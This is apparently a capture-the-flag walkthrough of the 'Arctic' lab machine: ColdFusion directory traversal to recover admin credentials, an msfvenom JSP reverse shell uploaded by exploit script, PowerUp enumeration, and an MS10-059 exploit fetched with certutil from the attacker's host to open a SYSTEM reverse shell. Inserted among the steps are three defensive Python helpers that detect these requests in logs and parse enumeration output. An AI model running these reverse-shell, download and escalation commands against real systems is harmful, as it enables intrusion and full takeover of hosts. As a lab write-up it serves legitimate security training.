Walkthrough
Gaining a Foothold
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -T4 -A -p- -Pn 10.129.94.47
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-18 21:08 EST
Nmap scan report for 10.129.94.47
Host is up (0.31s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open http JRun Web Server
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 406.25 seconds
Googling "CFIDE" identifies the web application as Adobe ColdFusion.
Research default credentials.
HTTP
Login form > Adobe ColdFusion
Adobe ColdFusion - Directory Traversal
https://www.exploit-db.com/exploits/14641
Hash recovered via the directory traversal: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
Credentials: admin / happyday
https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
Generate JSP reverse shell payload
https://ruuand.github.io/Reverse_Shells/
┌──(kali㉿kali)-[~/WPE/Arctic]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=7777 -f raw > shell.jsp
Payload size: 1496 bytes
Upload the payload to the target server
Research ColdFusion 8 exploit
https://github.com/nipunsomani/Adobe-ColdFusion-8-File-Upload-Exploit/blob/main/exploit.py
┌──(kali㉿kali)-[~/WPE/Arctic]
└─$ python cfidexploit.py 10.129.94.47 8500 /home/kali/WPE/Arctic/shell.jsp
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Sending payload...
Successfully uploaded payload!
Find it at http://10.129.94.47:8500/userfiles/file/exploit.jsp
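As an added detection-side example (not part of this write-up or of the linked exploit code), the script below scans web-server access-log lines for the two request shapes this foothold relies on: path traversal in the CFIDE `locale` parameter (the CVE-2010-2861 pattern from the linked FAQ, which reads password.properties) and a fetch of a server-side script under /userfiles/, where the uploaded JSP landed. The log lines, client addresses and rule names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access log (Common Log Format). Line 2 mirrors the
# CVE-2010-2861 locale traversal, line 4 mirrors the fetch of the uploaded
# JSP at /userfiles/file/; lines 1 and 5 are benign admin-login requests.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jan/2024:21:10:01 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 4123
10.0.0.9 - - [18/Jan/2024:21:12:44 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 5210
10.0.0.5 - - [18/Jan/2024:21:15:00 +0000] "POST /CFIDE/administrator/enter.cfm HTTP/1.1" 302 0
10.0.0.9 - - [18/Jan/2024:21:20:10 +0000] "GET /userfiles/file/exploit.jsp HTTP/1.1" 200 0
10.0.0.7 - - [18/Jan/2024:21:25:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 4123
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Extensions ColdFusion/JRun will execute if requested from a writable upload dir.
EXEC_EXT = ('.jsp', '.cfm', '.cfc', '.cfml')


def parse_line(line):
    """Split one CLF line into its fields; None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def traversal_in_locale(target):
    """True when a /CFIDE/ request carries '../' or a null byte in 'locale'.

    parse_qs already percent-decodes once; the extra unquote catches values
    that were double-encoded to slip past naive filters.
    """
    parts = urlsplit(target)
    if not parts.path.lower().startswith('/cfide/'):
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get('locale', []):
        decoded = unquote(value)
        if '../' in decoded or '..\\' in decoded or '\x00' in decoded:
            return True
    return False


def webshell_fetch(target):
    """True for a request of an executable server-side file under /userfiles/."""
    path = urlsplit(target).path.lower()
    return path.startswith('/userfiles/') and path.endswith(EXEC_EXT)


def scan_log(text):
    """Return (client, rule, target) for every line that trips a rule."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if traversal_in_locale(rec['target']):
            findings.append((rec['client'], 'cfide-locale-traversal', rec['target']))
        if webshell_fetch(rec['target']):
            findings.append((rec['client'], 'userfiles-executable-fetch', rec['target']))
    return findings


if __name__ == '__main__':
    for client, rule, target in scan_log(SAMPLE_LOG):
        print(f'{rule:28s} {client:12s} {target}')
```

Both rules key on the request alone, so they work on proxy or IIS/JRun logs alike; the second one is worth keeping enabled after patching, because a writable upload directory that serves .jsp is the condition that turned the upload into code execution here.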
Set up listener on port 7777
Open link
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.14.6] from (UNKNOWN) [10.129.94.47] 49610
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
C:\ColdFusion8\runtime\bin>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45
System Boot Time: 20/1/2024, 12:03:23
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2394 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 4.970 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 11.093 MB
Virtual Memory: In Use: 1.192 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.94.47
Transfer and execute PowerUp
C:\ColdFusion8\runtime\bin>powershell -ep bypass .\PowerUp.ps1
powershell -ep bypass .\PowerUp.ps1
Privilege : SeImpersonatePrivilege
Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 972
ProcessId : 3696
Name : 3696
Check : Process Token Privileges

ServiceName : ColdFusion 8 .NET Service
Path : C:\ColdFusion8\jnbridge\CF8DotNetsvc.exe
ModifiableFile : C:\ColdFusion8\jnbridge\CF8DotNetsvc.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 .NET Service'
CanRestart : False
Name : ColdFusion 8 .NET Service
Check : Modifiable Service Files

ServiceName : ColdFusion 8 Application Server
Path : "C:\ColdFusion8\runtime\bin\jrunsvc.exe"
ModifiableFile : C:\ColdFusion8\runtime\bin\jrunsvc.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : .\tolis
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 Application Server'
CanRestart : False
Name : ColdFusion 8 Application Server
Check : Modifiable Service Files

ServiceName : ColdFusion 8 ODBC Agent
Path : C:\ColdFusion8\db\slserver54\bin\swagent.exe "ColdFusion 8 ODBC Agent"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODBC Agent'
CanRestart : False
Name : ColdFusion 8 ODBC Agent
Check : Modifiable Service Files

ServiceName : ColdFusion 8 ODBC Agent
Path : C:\ColdFusion8\db\slserver54\bin\swagent.exe "ColdFusion 8 ODBC Agent"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODBC Agent'
CanRestart : False
Name : ColdFusion 8 ODBC Agent
Check : Modifiable Service Files

ServiceName : ColdFusion 8 ODBC Agent
Path : C:\ColdFusion8\db\slserver54\bin\swagent.exe "ColdFusion 8 ODBC Agent"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODBC Agent'
CanRestart : False
Name : ColdFusion 8 ODBC Agent
Check : Modifiable Service Files

ServiceName : ColdFusion 8 ODBC Agent
Path : C:\ColdFusion8\db\slserver54\bin\swagent.exe "ColdFusion 8 ODBC Agent"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin\swagent.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODBC Agent'
CanRestart : False
Name : ColdFusion 8 ODBC Agent
Check : Modifiable Service Files

ServiceName : ColdFusion 8 ODBC Server
Path : C:\ColdFusion8\db\slserver54\bin\swstrtr.exe "ColdFusion 8 ODBC Server"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODBC Server'
CanRestart : False
Name : ColdFusion 8 ODBC Server
Check : Modifiable Service Files

ServiceName : ColdFusion 8 ODBC Server
Path : C:\ColdFusion8\db\slserver54\bin\swstrtr.exe "ColdFusion 8 ODBC Server"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODBC Server'
CanRestart : False
Name : ColdFusion 8 ODBC Server
Check : Modifiable Service Files

ServiceName : ColdFusion 8 ODBC Server
Path : C:\ColdFusion8\db\slserver54\bin\swstrtr.exe "ColdFusion 8 ODBC Server"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODBC Server'
CanRestart : False
Name : ColdFusion 8 ODBC Server
Check : Modifiable Service Files

ServiceName : ColdFusion 8 ODBC Server
Path : C:\ColdFusion8\db\slserver54\bin\swstrtr.exe "ColdFusion 8 ODBC Server"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin\swstrtr.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODBC Server'
CanRestart : False
Name : ColdFusion 8 ODBC Server
Check : Modifiable Service Files

ServiceName : ColdFusion 8 Search Server
Path : "C:\ColdFusion8\verity\k2\_nti40\bin\k2admin.exe" -cfg "C:\ColdFusion8\verity\k2\common\verity.cfg" -ntstart 1
ModifiableFile : C:\ColdFusion8\verity\k2\_nti40\bin\k2admin.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 Search Server'
CanRestart : False
Name : ColdFusion 8 Search Server
Check : Modifiable Service Files

ServiceName : ColdFusion 8 Search Server
Path : "C:\ColdFusion8\verity\k2\_nti40\bin\k2admin.exe" -cfg "C:\ColdFusion8\verity\k2\common\verity.cfg" -ntstart 1
ModifiableFile : C:\ColdFusion8\verity\k2\common\verity.cfg
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 Search Server'
CanRestart : False
Name : ColdFusion 8 Search Server
Check : Modifiable Service Files

ModifiablePath : C:\ColdFusion8\lib
IdentityReference : ARCTIC\tolis
Permissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
%PATH% : C:\ColdFusion8\runtime\..\lib
Name : C:\ColdFusion8\runtime\..\lib
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\lib\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\lib
IdentityReference : BUILTIN\Users
Permissions : AppendData/AddSubdirectory
%PATH% : C:\ColdFusion8\runtime\..\lib
Name : C:\ColdFusion8\runtime\..\lib
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\lib\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\lib
IdentityReference : BUILTIN\Users
Permissions : WriteData/AddFile
%PATH% : C:\ColdFusion8\runtime\..\lib
Name : C:\ColdFusion8\runtime\..\lib
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\lib\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\jintegra\bin
IdentityReference : ARCTIC\tolis
Permissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin
Name : C:\ColdFusion8\runtime\..\jintegra\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\jintegra\bin
IdentityReference : BUILTIN\Users
Permissions : AppendData/AddSubdirectory
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin
Name : C:\ColdFusion8\runtime\..\jintegra\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\jintegra\bin
IdentityReference : BUILTIN\Users
Permissions : WriteData/AddFile
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin
Name : C:\ColdFusion8\runtime\..\jintegra\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\jintegra\bin\international
IdentityReference : ARCTIC\tolis
Permissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin\international
Name : C:\ColdFusion8\runtime\..\jintegra\bin\international
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\international\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\jintegra\bin\international
IdentityReference : BUILTIN\Users
Permissions : AppendData/AddSubdirectory
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin\international
Name : C:\ColdFusion8\runtime\..\jintegra\bin\international
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\international\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\jintegra\bin\international
IdentityReference : BUILTIN\Users
Permissions : WriteData/AddFile
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin\international
Name : C:\ColdFusion8\runtime\..\jintegra\bin\international
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\international\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\verity\k2\_nti40\bin
IdentityReference : ARCTIC\tolis
Permissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
%PATH% : C:\ColdFusion8\verity\k2\_nti40\bin
Name : C:\ColdFusion8\verity\k2\_nti40\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\verity\k2\_nti40\bin\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\verity\k2\_nti40\bin
IdentityReference : BUILTIN\Users
Permissions : AppendData/AddSubdirectory
%PATH% : C:\ColdFusion8\verity\k2\_nti40\bin
Name : C:\ColdFusion8\verity\k2\_nti40\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\verity\k2\_nti40\bin\wlbsctrl.dll'

ModifiablePath : C:\ColdFusion8\verity\k2\_nti40\bin
IdentityReference : BUILTIN\Users
Permissions : WriteData/AddFile
%PATH% : C:\ColdFusion8\verity\k2\_nti40\bin
Name : C:\ColdFusion8\verity\k2\_nti40\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\verity\k2\_nti40\bin\wlbsctrl.dll'
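PowerUp emits one Format-List record per ACE, and the console wraps long values at 80 columns, even mid-word, which is why the same service shows up four times above with pieces like "Execute/Travers" / "e, DeleteChild...}". The script below is an added triage helper, not PowerUp's own code: it re-joins the wrapped values, splits records at blank lines or at a repeated key, and collapses the output into one finding per modifiable target with every identity that can write to it and whether the service runs as LocalSystem. The sample input is a constructed excerpt shaped like the output above.

```python
import re

# Constructed excerpt in PowerUp's Format-List shape, including wrapped values
# and records both with and without blank-line separators.
SAMPLE_POWERUP = r"""
ServiceName                     : ColdFusion 8 ODBC Agent
Path                            : C:\ColdFusion8\db\slserver54\bin\swag
                                  ent.exe "ColdFusion 8 ODBC Agent"
ModifiableFile                  : C:\ColdFusion8\db\slserver54\bin\swagent.exe
ModifiableFilePermissions       : {ReadAttributes, ReadControl, Execute/Travers
                                  e, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'ColdFusion 8 ODB
                                  C Agent'
CanRestart                      : False
Name                            : ColdFusion 8 ODBC Agent
Check                           : Modifiable Service Files

ServiceName                     : ColdFusion 8 ODBC Agent
Path                            : C:\ColdFusion8\db\slserver54\bin\swagent.exe
ModifiableFile                  : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions       : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
CanRestart                      : False
Name                            : ColdFusion 8 ODBC Agent
Check                           : Modifiable Service Files

ServiceName                     : ColdFusion 8 Application Server
Path                            : "C:\ColdFusion8\runtime\bin\jrunsvc.exe"
ModifiableFile                  : C:\ColdFusion8\runtime\bin\jrunsvc.exe
ModifiableFilePermissions       : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName                       : .\tolis
CanRestart                      : False
Name                            : ColdFusion 8 Application Server
Check                           : Modifiable Service Files

ModifiablePath : C:\ColdFusion8\lib
IdentityReference : ARCTIC\tolis
Permissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
%PATH% : C:\ColdFusion8\runtime\..\lib
Name : C:\ColdFusion8\runtime\..\lib
Check : %PATH% .dll Hijacks
ModifiablePath : C:\ColdFusion8\lib
IdentityReference : BUILTIN\Users
Permissions : WriteData/AddFile
%PATH% : C:\ColdFusion8\runtime\..\lib
Name : C:\ColdFusion8\runtime\..\lib
Check : %PATH% .dll Hijacks
"""

# A field line is "<Key><spaces>:<value>"; the mandatory whitespace before the
# colon keeps a wrapped continuation such as "C:\..." from looking like a key.
FIELD_RE = re.compile(r'^\s*([A-Za-z%][A-Za-z0-9%]*)\s+:\s?(.*)$')


def parse_powerup(text):
    """Parse Format-List output into a list of {key: value} records.

    Continuation lines are appended with no separator, because PowerShell
    wraps at the console width regardless of token boundaries.
    """
    records, current, last_key = [], {}, None
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current, last_key = {}, None
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            if key in current:              # same key again => new record
                records.append(current)
                current = {}
            current[key] = value
            last_key = key
        elif last_key is not None:          # wrapped remainder of last value
            current[last_key] += line.strip()
    if current:
        records.append(current)
    return records


def summarize(records):
    """One finding per (check, target): who can write it, and as whom it runs."""
    findings = {}
    for r in records:
        check = r.get('Check', '')
        if check == 'Modifiable Service Files':
            target, ident, runs_as = r['ModifiableFile'], r['ModifiableFileIdentityReference'], r.get('StartName')
        elif check == '%PATH% .dll Hijacks':
            target, ident, runs_as = r['ModifiablePath'], r['IdentityReference'], None
        else:
            continue
        f = findings.setdefault((check, target), {
            'check': check, 'target': target, 'service': r.get('ServiceName'),
            'runs_as': runs_as, 'writers': set(),
        })
        f['writers'].add(ident)
    for f in findings.values():
        f['system_service'] = f['runs_as'] == 'LocalSystem'
        f['users_group_writable'] = 'BUILTIN\\Users' in f['writers']
    return list(findings.values())


if __name__ == '__main__':
    for f in summarize(parse_powerup(SAMPLE_POWERUP)):
        print(f"{f['check']:26s} {f['target']:50s} writers={sorted(f['writers'])} "
              f"runs_as={f['runs_as']} system={f['system_service']}")
```

The two booleans are the ones a hardening review cares about: a LocalSystem service whose binary or directory is writable by BUILTIN\Users is an ACL defect on the installation directory (here, the ColdFusion8 tree) and is fixed by removing the inherited write rights, not by touching the service itself.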
C:\ColdFusion8\runtime\bin>net user tolis
net user tolis
User name tolis
Full Name tolis
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 22/3/2017 8:07:58
Password expires Never
Password changeable 22/3/2017 8:07:58
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 20/1/2024 12:03:35
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
Escalating Privilege
Windows Exploit Suggester
┌──(kali㉿kali)-[/opt/Windows-Exploit-Suggester-python3]
└─$ sudo ./windows-exploit-suggester.py --database 2024-01-18-mssb.xlsx --systeminfo /home/kali/WPE/Arctic/systeminfo.txt
[*] initiating winsploit version 3.4...
[*] database file detected as xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
C:\ColdFusion8\runtime\bin>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
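The suggester's input is the raw systeminfo capture, and the decisive fields in it are the build number and the hotfix list ("Hotfix(s): N/A" above means nothing installed). The script below is an added triage helper, not part of the suggester or of this write-up: it parses a systeminfo capture (both the "N/A" form and the enumerated "[01]: KB..." form) and a whoami /priv table, and reports the build, the patch state and which enabled privileges fall in a set I chose as worth flagging in a hardening review (an assumption, not the suggester's or PowerUp's list). The sample captures are constructed to match the shape of the output above; the KB numbers in the patched sample are placeholders.

```python
import re

# Constructed systeminfo excerpt shaped like the capture above (no hotfixes).
SAMPLE_SYSTEMINFO = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Boot Time:          20/1/2024, 12:03:23
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed excerpt in the enumerated form; KB ids are placeholders.
PATCHED_SYSTEMINFO = """\
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB1111111
                           [02]: KB2222222
"""

# Constructed whoami /priv capture with the real column layout.
SAMPLE_PRIV = """\

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges flagged for review (my chosen set; an assumption for this example).
REVIEW_PRIVS = {
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeDebugPrivilege',
    'SeBackupPrivilege', 'SeRestorePrivilege', 'SeTakeOwnershipPrivilege',
    'SeLoadDriverPrivilege',
}

KEY_RE = re.compile(r'^(\S[^:]*?):\s*(.*)$')   # "Key: value", key up to first colon
KB_RE = re.compile(r'\[\d+\]:\s*(KB\d+)')


def parse_systeminfo(text):
    """Return systeminfo fields as a dict plus a 'hotfixes' list of KB ids."""
    info, section = {'hotfixes': []}, None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m and not line.startswith(' '):          # top-level field
            section, value = m.group(1), m.group(2).strip()
            info[section] = value
        elif section == 'Hotfix(s)':                # indented "[nn]: KBxxxxxx" lines
            km = KB_RE.search(line)
            if km:
                info['hotfixes'].append(km.group(1))
    return info


def parse_privs(text):
    """Map privilege name -> State from a whoami /priv table.

    The description column can be filled to its full width (one space before
    the state), so split on whitespace and take the first and last tokens.
    """
    privs, in_table = {}, False
    for line in text.splitlines():
        if line.startswith('='):
            in_table = True
            continue
        if in_table and line.strip():
            parts = line.split()
            privs[parts[0]] = parts[-1]
    return privs


def triage(systeminfo_text, privs_text):
    """Summarise patch state and notable enabled privileges for one host."""
    info = parse_systeminfo(systeminfo_text)
    privs = parse_privs(privs_text)
    build = re.search(r'Build (\d+)', info.get('OS Version', ''))
    return {
        'os': info.get('OS Name'),
        'build': int(build.group(1)) if build else None,
        'hotfix_count': len(info['hotfixes']),
        'unpatched': info.get('Hotfix(s)', '').upper() == 'N/A' or not info['hotfixes'],
        'review_privileges': sorted(p for p, s in privs.items()
                                    if s == 'Enabled' and p in REVIEW_PRIVS),
    }


if __name__ == '__main__':
    print(triage(SAMPLE_SYSTEMINFO, SAMPLE_PRIV))
```

An empty hotfix list on a 7600 build is the condition the suggester turned into the MS10-059 hit; the same two fields are what a patch-compliance check should alert on long before anyone runs a suggester against the host.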
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
Ran into issues.
Fix: create a directory called temp, transfer MS10-059.exe into it and execute it from there.
Set up a reverse shell listener.
C:\temp>certutil -urlcache -f http://10.10.14.6:8000/MS10-059.exe MS10-059.exe
certutil -urlcache -f http://10.10.14.6:8000/MS10-059.exe MS10-059.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8
Directory of C:\temp
20/01/2024 03:00 <DIR> .
20/01/2024 03:00 <DIR> ..
20/01/2024 03:00 784.384 MS10-059.exe
1 File(s) 784.384 bytes
2 Dir(s) 1.423.241.216 bytes free
C:\temp>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress por
C:\temp>MS10-059.exe 10.10.14.6 5555
MS10-059.exe 10.10.14.6 5555
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chim values...<BR>
Reverse Shell
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 5555
